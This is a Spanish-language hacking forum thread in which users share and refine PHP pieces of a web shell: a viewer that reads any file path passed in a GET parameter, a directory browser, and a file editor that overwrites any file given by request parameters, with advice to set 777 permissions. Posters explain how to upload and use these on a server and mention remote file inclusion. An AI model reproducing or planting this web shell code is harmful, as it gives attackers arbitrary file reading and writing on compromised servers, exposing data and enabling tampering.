Ver Sources de archivos =D

[vengador de las sombras]

Bien, aquí os dejo una parte de una WebShell que estoy codeando para ArgeniversoHac k:

Código:

<?php
if(isset($_GET['source'])){
$source=explode('/',$_GET['source']);
$sourceb=array_reverse($source);
$asf=$_GET["source"];
echo '<div style="top: 123%"><textarea cols="100" rows="30" READONLY color=red>';
@$lectura=fopen($_GET['source'],'r');
@$lectura=fread($lectura,filesize($asf));
/*Esto es imrpotante, así evitamos ejecutar html */
echo htmlentities($lectura);
echo '</textarea></div><!--';
exit();
}
?>

El archivo que queramos ver, debe de estar en nuestro servidor (a menos que sea un RFI ). Simplemente pondríamos nuestroarchivo .php?source=AquirutaYaRcHiVo

Esto viene bien unido a un listador de archivos...:

Código:

<?php
if($_GET['path']==""){
$lala=dirname($lugarshell);
@$directorio=dir($lala);
$ruta=$lala;
}
else{
@$directorio=dir($_GET['path']);
$ruta=$_GET['path'];

}
?>
<?php 
$path="$ruta"; 
$directorio=dir($path); 

echo "<br><br>"; 

while ($archivo = $directorio->read()) 
/* Con esto voy a intentar hacer que cuando sea un directorio, haga ?path, para ir a ese directorio*/
{ 
  $extension=filetype($ruta.'/'.$archivo);
 if ($extension=="dir"){
 echo "<font color=red><b>(<a href=?path=$ruta/$archivo>$archivo</a>)</b></font><br>"; 

}
/* Y si en vez de ser un directorio, es un archivo, vemos su Codigo Fuente =D */
else {
echo "<a href=?source=$ruta/$archivo>$archivo</a><br>"; 
}
} 
$directorio->close(); 
echo "<br><br>";
?>

Es normal que las variables no sepais que son (como lugarshell). $lugarshell=$_SERVER[SCRIPT_FILENAME]

Bytes a todos.

[MatU_MalO]

Aunque leo y leo no lo entiendo xDDDD
Como hago para hacerlo funcionar
No entendi estas partes

Simplemente pondríamos nuestroarchivo .php?source=AquirutaYaRcHiVo

listador de archivos

[DarkAngel]

Es bastante simple, por lo que vi en el primer código lo que hace es capturar la variable "source" que se pasa por el método "get" y muestra el contenido del archivo pasado por "get" en un textarea no modificable y usa la función htmlentities para que se muestren los tags html como texto común y corriente.

El segundo no lo he leído todavía.

En conclusión, si quieres hacer funcionar el primero, simplemente copias y pegas el código, lo guardas como archivo.php, lo subes a algún servidor, y lo abres así:

http://pagina.com/archivo.php?source=NOMBREARCHIVO.extencion

siendo NOMBREARCHIVO. extencion cualquier archivo, como por ejemplo hola.html o quetal.html

[MatU_MalO]

Muchas gracias 
la extension tiene que ser html o puede ser cualquiera??

[vengador de las sombras]

Muchas gracias 
la extension tiene que ser html o puede ser cualquiera??

.txt, .html, .php, etc

Si lo subes a un server verás el funcionamiento . Como dijo DarkAngel es muy simple, pero a mi me sirve mucho para ver los archivos que hay en el directorio XD.

[Dacan]

Yo Tengo algo mejor Mira el Source y lo Puede Modificar:

<? 
$fichero = $_GET["fichero"];
$texto = $_POST["texto"];
if($texto != ''){
   if($fp = fopen($fichero,"w+")){
      fwrite($fp,stripslashes($texto));
      echo 'Archivo modificado<br><br>';
   }
   fclose($fp);
}
$fp = fopen($fichero,"r"); 
$contenido = fread ($fp, filesize ($fichero));
fclose($fp);
echo "<form method=\"POST\"><textarea name=\"texto\"$contenido</textarea><br><input type=\"Submit\" value=\"Guardar\"></form>";
?>  

Dale permisos 777.

Saludos, Dacan 

[carlmycol]

Esta muy buena el primero lo que haces es tomar el texto que esta dentro del archivo, filtrarle los caracteres html y mostrar, es muy util, el segundo abra el directorio y lo revisa.

Quedaria unir los dos y hacer una variable get para interactuar entre los dos codigos

Algo como

Código:

$opcion=$_GET['opcion'];
switch($opcion) {
case "ver": {
        .......Se muestran archivos en directorio raiz............
}
case "source": {
         .........Se muestra codigo de archivo..........
}
}

Y se interactual las funsiones a travez se links como ?opcion=source =P

Buen aporte.

salu2